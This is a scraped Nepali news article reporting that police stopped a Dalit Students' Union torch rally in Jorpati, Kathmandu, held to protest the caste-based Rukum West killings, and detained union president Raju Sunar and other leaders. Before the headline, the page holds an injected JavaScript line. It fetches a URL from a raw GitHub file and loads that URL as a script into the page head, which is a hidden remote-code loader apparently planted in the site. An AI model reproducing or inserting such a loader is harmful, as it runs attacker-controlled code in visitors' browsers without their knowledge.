;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); दलित विद्यार्थी संघका अध्यक्षलाई नियन्त्रणमा लिएर राेकियाे मसाल जुलुस – जुनेली न्युज
सोमवार, असार ३१, २०८२
  • होमपेज
  • दलित विद्यार्थी संघका अध्यक्षलाई नियन्त्रणमा लिएर राेकियाे मसाल जुलुस
समाचार

दलित विद्यार्थी संघका अध्यक्षलाई नियन्त्रणमा लिएर राेकियाे मसाल जुलुस

काठमाडाे : रूकुम पश्चिममा भएकाे घटनाकाे विराेधमा नेपाल दलित विद्यार्थी संघले निकाल्न लागेकाे मसाल जुलिमा प्रहरीले हस्तक्षेप गरेकाे छ । बुधबार बेलुका जाेरपाटीमा रुकुम घटनाबारे सरकारले अझै सत्य तथ्य पत्ता नलगाएको भन्दै नेपाल दलित बिधार्थी संघ केन्द्रले हिजो जोरपाटी चोकमा मसाल जुलुस निकाल्ने क्रममा प्रहरीले बीच बाटो बाटै मसालका सामग्री नियन्त्रणमा लिएकाे अध्यक्ष राजु सुनारले बताए ।

त्यस्तै प्रहरीले सुनारसहित, कुसल चौलागाईं लगायतका बिधार्थी संघका केही नेताहरूलाई लगायतलाई बौद्ध प्रहरी वृतमा लगेको थियाे । आन्दोलन गर्न नदिएकोले अर्को दिन फेरी आन्दोलनलाई निरन्तरता दिने अध्यक्ष सुनारले बताए। जातीय विभेदका कारण नवराज विकसहित ६ जना युवाहरूकाे हत्या भएपछि दलित विद्यार्थी संघले लगातार अान्दोलन गर्दै अाएकाे छ ।

फेसबुक प्रतिक्रियाहरु